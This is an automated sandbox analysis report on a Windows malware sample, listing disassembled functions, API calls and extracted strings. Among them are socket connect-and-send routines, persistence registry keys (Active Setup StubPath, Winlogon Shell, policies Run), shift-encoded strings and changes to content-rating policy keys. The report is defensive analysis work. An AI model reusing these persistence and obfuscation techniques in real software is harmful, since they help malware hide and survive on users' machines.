Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 3556cb1883950fdce60b7b040b56879e2709dbca810ff9c187c03c1a6c302ff5
Instruction ID: 9b5d2ad31b0c38bfbcad70f2659bc3f843850c43e70fecdea2b33c4b04752897
Opcode Fuzzy Hash: 3556cb1883950fdce60b7b040b56879e2709dbca810ff9c187c03c1a6c302ff5
Instruction Fuzzy Hash: 24F068B1E051099BCB20DF98C4848D9B774FA56302B54419AE808D7352EB34E594C795

Uniqueness

Uniqueness Score: -1.00%

Function 0048C6DC Relevance: 1.5, APIs: 1, Instructions: 15timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0048C6E4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: b74925067c204dc46c1b4737c47e6d6913bfa9e162a64f5607bc9ea0709191bc
Instruction ID: 0948ba95a372b288faebdd672c079d6f94b69fdf748ca41ad2f4bcbff2c00030
Opcode Fuzzy Hash: b74925067c204dc46c1b4737c47e6d6913bfa9e162a64f5607bc9ea0709191bc
Instruction Fuzzy Hash: 1ED09E5840860795C300FF99C84549EF7E9BE98B10F804D9DF9E482791EB35859DC7BB

Uniqueness

Uniqueness Score: -1.00%

Function 00434C0C Relevance: 68.5, APIs: 27, Strings: 12, Instructions: 282COMMON

Download Yara Rule

Strings

setsockopt(SO_BROADCAST), xrefs: 00434ED4
Connect: No Port Specified, xrefs: 00434C67
WSAAsyncSelect, xrefs: 00434FD0
0.0.0.0, xrefs: 00434EFB
Connect: No Protocol Specified, xrefs: 00434CA3
3', xrefs: 0043503D
Connect: No IP Address Specified, xrefs: 00434C85
setsockopt(SO_REUSEADDR), xrefs: 00434F85
Connect, xrefs: 0043505D
setsockopt(SO_KEEPALIVE), xrefs: 00434F45
Connect: Socket already in use, xrefs: 00434C49
Connect (socket), xrefs: 00434E62

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID: 0.0.0.0$3'$Connect$Connect (socket)$Connect: No IP Address Specified$Connect: No Port Specified$Connect: No Protocol Specified$Connect: Socket already in use$WSAAsyncSelect$setsockopt(SO_BROADCAST)$setsockopt(SO_KEEPALIVE)$setsockopt(SO_REUSEADDR)
API String ID: 0-3701768161
Opcode ID: 12eda2b9be159db0852d66f6187f3e3c32044288b6c6544eb123353a7d1b2b6c
Instruction ID: 824c750ac0eec5f76fa3612ed95fa2ba8d7117e12f8f7a7f281f092407771ae7
Opcode Fuzzy Hash: 12eda2b9be159db0852d66f6187f3e3c32044288b6c6544eb123353a7d1b2b6c
Instruction Fuzzy Hash: F4D14974A00508EFDB04DB98C585AEDB7F1EF49304F2491FAE504AB362C739AE45EB48

Uniqueness

Uniqueness Score: -1.00%

Function 0042E750 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 319networkthreadsleepCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 0042E771
gethostbyname.WS2_32(?), ref: 0042E77F
connect.WS2_32(?,?,00000010), ref: 0042E7A9
Sleep.KERNEL32(?,?,?,00000010,?,00000002,00000001,00000000,?,?,?,4004667F,00000000,?,000000FF,?), ref: 0042E7BD
gethostbyname.WS2_32(?), ref: 0042E7C8
connect.WS2_32(?,?,00000010), ref: 0042E7F2
inet_ntoa.WS2_32(?), ref: 0042E806
gethostname.WS2_32(?,000000FF), ref: 0042E82B
inet_ntoa.WS2_32(?), ref: 0042E872
send.WS2_32(?,?,00000000,00000000), ref: 0042E8DA
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000021,?,?,00000000,00000000,?,?,?,?,?,?,00000001), ref: 0042E902
ioctlsocket.WS2_32(?,4004667F,00000000), ref: 0042E913
closesocket.WS2_32(?), ref: 0042E929
CreateThread.KERNEL32(00000000,00000000,0042E750,00000000,00000000,?), ref: 0042E945
ResetEvent.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,0042E750,00000000,00000000,?,?,4004667F,00000000,?,000000FF), ref: 0042E974
socket.WS2_32(00000002,00000001,00000000), ref: 0042E988
connect.WS2_32(?,?,00000010), ref: 0042E998
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000021,?,?,00000010,00000002,00000001,00000000,?,?,?), ref: 0042E9C8
ioctlsocket.WS2_32(?,4004667F,00000000), ref: 0042E9D9
ioctlsocket.WS2_32(?,4004667F,?), ref: 0042E9EA
closesocket.WS2_32(?), ref: 0042EA0E
closesocket.WS2_32(?), ref: 0042EA16
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,4004667F,00000000,?,4004667F,00000000,00000002,?,00000000,000000FF,?), ref: 0042EA1D
ResetEvent.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,4004667F,00000000,?,4004667F,00000000), ref: 0042EA4E
ioctlsocket.WS2_32(?,8004667E,?), ref: 0042EA6C
send.WS2_32(?,?,00000000,00000000), ref: 0042EA7C
ResetEvent.KERNEL32(?,?,?,00000000,00000000,?,4004667F,?,?,4004667F,00000000,00000002,?,00000000,000000FF,?), ref: 0042EAD9
ioctlsocket.WS2_32(?,8004667E,?), ref: 0042EAF7
send.WS2_32(?,?,00000000,00000000), ref: 0042EB07

Strings

1.9#, xrefs: 0042E85C
(Uknown), xrefs: 0042E833

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ioctlsocket$EventResetclosesocketconnectsend$ThreadWaitgethostbynameinet_ntoasocket$CreateExitMultipleObjectObjectsSingleSleepUsergethostname
String ID: (Uknown)$1.9#
API String ID: 3448724289-3263816225
Opcode ID: 1a09f7b041e18a56316ad1bc21571f8e52768c5469db081d32e9ffcc43c32e58
Instruction ID: 4fe6e2548878cb6a0e086a96af022214a1cfdf9d3249d175261d6646489fb7d2
Opcode Fuzzy Hash: 1a09f7b041e18a56316ad1bc21571f8e52768c5469db081d32e9ffcc43c32e58
Instruction Fuzzy Hash: CCC1E871D10118BFDF01ABA1DC42BEDBB7AFF58314F20406AF500761A2DB7A5A51EB68

Uniqueness

Uniqueness Score: -1.00%

Function 0045CF00 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 248windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 0045CF43
SelectObject.GDI32(?,?), ref: 0045CF58
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0045CFD3,?,?), ref: 0045CFA7
SelectObject.GDI32(?,?), ref: 0045CFC1
DeleteObject.GDI32(?), ref: 0045CFCD
CreateCompatibleDC.GDI32(00000000), ref: 0045CFE1
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0045D002
SelectObject.GDI32(?,?), ref: 0045D017
SelectPalette.GDI32(?,650807DA,00000000), ref: 0045D02B
SelectPalette.GDI32(?,?,00000000), ref: 0045D03D
SelectPalette.GDI32(?,00000000,000000FF), ref: 0045D052
SelectPalette.GDI32(?,650807DA,000000FF), ref: 0045D068
RealizePalette.GDI32(?), ref: 0045D074
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0045D096
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0045D0B8
SetTextColor.GDI32(?,00000000), ref: 0045D0C0
SetBkColor.GDI32(?,00FFFFFF), ref: 0045D0CE
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0045D0FA
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0045D11F
SetTextColor.GDI32(?,?), ref: 0045D129
SetBkColor.GDI32(?,?), ref: 0045D133
SelectObject.GDI32(?,00000000), ref: 0045D146
DeleteObject.GDI32(?), ref: 0045D14F
SelectPalette.GDI32(?,00000000,00000000), ref: 0045D171
DeleteDC.GDI32(?), ref: 0045D17A

Strings

xS], xrefs: 0045CF1B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID: xS]
API String ID: 3976802218-569361188
Opcode ID: 9029f76c0740497ad261e9e757e9dfb381b4b9f1d83cf814bf922decff54f2b1
Instruction ID: b797053a36f636c8a74b28febe6592a90e4434b59e99a042450835da614e53d6
Opcode Fuzzy Hash: 9029f76c0740497ad261e9e757e9dfb381b4b9f1d83cf814bf922decff54f2b1
Instruction Fuzzy Hash: E58171B1A00209AFDB50DEA9CD81EEF77FDAB09714F15055AFA18E7241C678AD008B79

Uniqueness

Uniqueness Score: -1.00%

Function 0041318C Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 336stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,000F003F,?), ref: 004132BC
lstrcpy.KERNEL32(?,?), ref: 00413346
RegCloseKey.ADVAPI32(?,?,?,?,?,80000003,00000000,00000000,000F003F,?), ref: 0041335A
RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,000F003F,?,?,?,?,?,?,80000003,00000000,00000000,000F003F,?), ref: 00413378
RegEnumValueA.ADVAPI32(?,?,?,00000064,00000000,00000003,?,00000064,80000003,00000000,00000000,000F003F,?,?), ref: 004133D2
RegEnumValueA.ADVAPI32(?,?,?,00000064,00000000,00000003,?,00000064,?,?,?,?,80000003,00000000,00000000,000F003F), ref: 00413316

Part of subcall function 00412E5C: lstrlen.KERNEL32(?), ref: 00412E62
Part of subcall function 00412E5C: lstrlen.KERNEL32(?,?), ref: 00412E6F

lstrcpy.KERNEL32(?,?), ref: 00413402
RegCloseKey.ADVAPI32(?,80000003,00000000,00000000,000F003F,?,?,?,?,?,?,80000003,00000000,00000000,000F003F,?), ref: 00413416
wsprintfA.USER32 ref: 0041342A
lstrcmp.KERNEL32(?,?), ref: 00413469
lstrcpy.KERNEL32(?,?), ref: 00413486
lstrcpy.KERNEL32(?,?), ref: 004134A5
lstrcpy.KERNEL32(?,?), ref: 004134BE
lstrcmp.KERNEL32(?,?), ref: 0041351E
lstrcpy.KERNEL32(?,?), ref: 0041354A

Strings

Rnguv`sd]Lhbsnrngu]LROLdrrdofds]MhruB`bid]/ODU!Ldrrdofds!Rdswhbd, xrefs: 004131B8
8, xrefs: 004135A3
d, xrefs: 0041339D
n)\, xrefs: 004131FE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: lstrcpy$CloseEnumOpenValuelstrcmplstrlen$wsprintf
String ID: 8$Rnguv`sd]Lhbsnrngu]LROLdrrdofds]MhruB`bid]/ODU!Ldrrdofds!Rdswhbd$d$n)\
API String ID: 3324811085-3513186605
Opcode ID: 3b9ab807ef43552ecbc210e8f82a9ccc7ef6951d0a7daf06f0384005064b9a85
Instruction ID: 9bf688139eea60d335e9af9bbd890cd0e9215ad38679b37f79ca27fbba1f92ac
Opcode Fuzzy Hash: 3b9ab807ef43552ecbc210e8f82a9ccc7ef6951d0a7daf06f0384005064b9a85
Instruction Fuzzy Hash: FAE1F570D0024C9EDF14DFE1C985AEDB7B9FF54308F1081AEE405AA256EB786A4ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD34 Relevance: 32.0, APIs: 8, Strings: 10, Instructions: 459fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042AE40
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042AEA7
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0042AF44

Part of subcall function 00410A18: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410A2F

Strings

Shell, xrefs: 0042B189
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\, xrefs: 0042B08F
P\, xrefs: 0042ADAD
StubPath, xrefs: 0042B0C3
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0042B130
t, xrefs: 0042AF1B
P\, xrefs: 0042AD53
Explorer.exe , xrefs: 0042B174
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\, xrefs: 0042AFEE
-Q\, xrefs: 0042B022

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CopyFile$CreateSnapshotToolhelp32
String ID: -Q\$Explorer.exe $SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\$Shell$StubPath$t$P\$P\
API String ID: 705217102-28768629
Opcode ID: b176bb787a36a956e8f7a5e725a56ea1542562f0845706ea264bf7714cc078d5
Instruction ID: 5c295726aadc55b377101ca550da42e1be0574fe5ce65a664947fa36eca39d52
Opcode Fuzzy Hash: b176bb787a36a956e8f7a5e725a56ea1542562f0845706ea264bf7714cc078d5
Instruction Fuzzy Hash: A4122D34A10258CBDB10EBD5D846BDDB7B8FF45308F20402BE4107B2A6D7B8994ADF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046031C Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0046033F
GetDC.USER32(00000000), ref: 0046036D
CreateCompatibleDC.GDI32(?), ref: 0046037E
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00460399
SelectObject.GDI32(?,00000000), ref: 004603B3
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004603D5
CreateCompatibleDC.GDI32(?), ref: 004603E3
SelectObject.GDI32(?), ref: 0046042B
SelectPalette.GDI32(?,?,00000000), ref: 0046043E
RealizePalette.GDI32(?), ref: 00460447
SelectPalette.GDI32(?,?,00000000), ref: 00460453
RealizePalette.GDI32(?), ref: 0046045C
SetBkColor.GDI32(?), ref: 00460466
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0046048A
SetBkColor.GDI32(?,00000000), ref: 00460494
SelectObject.GDI32(?,00000000), ref: 004604A7
DeleteObject.GDI32 ref: 004604B3
DeleteDC.GDI32(?), ref: 004604C9
SelectObject.GDI32(?,00000000), ref: 004604E4
DeleteDC.GDI32(00000000), ref: 00460500
ReleaseDC.USER32(00000000,00000000), ref: 00460511

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: a79edcf77fa9b204d0ba72b66d56b3d79e436a5d1d55231466253898721afc07
Instruction ID: 25befd39347cef96d123f869efc4c11fb5223606a694de204079f649deb9f3f0
Opcode Fuzzy Hash: a79edcf77fa9b204d0ba72b66d56b3d79e436a5d1d55231466253898721afc07
Instruction Fuzzy Hash: BF51CD71E00209BFDB10DBE9CC55FEFB7BCAB48704F14445AB614E7281DA789944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408A58 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 494COMMON

Download Yara Rule

APIs

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00408B9A

Strings

vsln, xrefs: 00408E66
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy, xrefs: 004091D4
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default, xrefs: 00409016
Key, xrefs: 00408B55
errLine, xrefs: 0040918B
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html, xrefs: 00408DD0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings, xrefs: 00408AA2
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default, xrefs: 00408C6F
Allow_Unknowns, xrefs: 00408D05
Enabled, xrefs: 00408D84
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0, xrefs: 004090B7
dwFlags, xrefs: 0040914D
\RSACi.rat, xrefs: 00408BAE
FileName0, xrefs: 00408BEE
PleaseMom, xrefs: 00408D46
t, xrefs: 00408CFC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DirectoryOpenSystem
String ID: Allow_Unknowns$Enabled$FileName0$Key$PleaseMom$\RSACi.rat$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0$\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy$dwFlags$errLine$t$vsln
API String ID: 4120783374-887025228
Opcode ID: 92c0f6e5599b387f58e01c62123941eeeecfb8b50a4c2b167ce7b4dfeb512c97
Instruction ID: c142660752fdac21064a308b8dd949defd1ea74e83257a10b6e8d452822543bd
Opcode Fuzzy Hash: 92c0f6e5599b387f58e01c62123941eeeecfb8b50a4c2b167ce7b4dfeb512c97
Instruction Fuzzy Hash: 8332EF34A10219CFDB20DB94C885B9DB3B5FF8A305F2080EAD80967356D7795E89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00412EB0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 217registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00412F1C
RegQueryValueExA.ADVAPI32(?,005C292C,00000000,00000000,?,?,?,?,?,?,80000001,00000000), ref: 00412F48
RegCloseKey.ADVAPI32(?,?,005C292C,00000000,00000000,?,?,?,?,?,?,80000001,00000000), ref: 00412F50
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000,?,?,005C292C,00000000,00000000,?,?), ref: 00412F6E
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00412F8E
CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000004,00000080,00000000,?,?,005C292C,00000000,00000000,?,?), ref: 00412F9F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000004,00000080,00000000,?,?,005C292C,00000000), ref: 00412FD2
CloseHandle.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000004,00000080,00000000,?,?,005C292C), ref: 00412FE3
CloseHandle.KERNEL32(?,00000000,00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000004,00000080,00000000,?,?), ref: 00412FEB

Strings

D, xrefs: 00413141
,, xrefs: 0041310E
Rnguv`sd]Lhbsnrngu]V@C]V@C5]V`c!Ghmd!O`ld, xrefs: 00412EC9
D, xrefs: 004130D6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Close$FileHandle$Create$MappingOpenQueryValueView
String ID: ,$D$D$Rnguv`sd]Lhbsnrngu]V@C]V@C5]V`c!Ghmd!O`ld
API String ID: 1925638041-2685336331
Opcode ID: d349b38241f35b9b446cc3a14fc0fb8aa989dd5661815d1f2beb0c343147bf2a
Instruction ID: c126363f4f90fd9336b8864513bf7d8fd63d92386aa3c1eed3d8ac051309724f
Opcode Fuzzy Hash: d349b38241f35b9b446cc3a14fc0fb8aa989dd5661815d1f2beb0c343147bf2a
Instruction Fuzzy Hash: 16916A30A00259AFDF14EFA4CD42BEDBBB5FF49304F20416AE405BB292D7785A46CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00412598 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 174stringprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004125AF
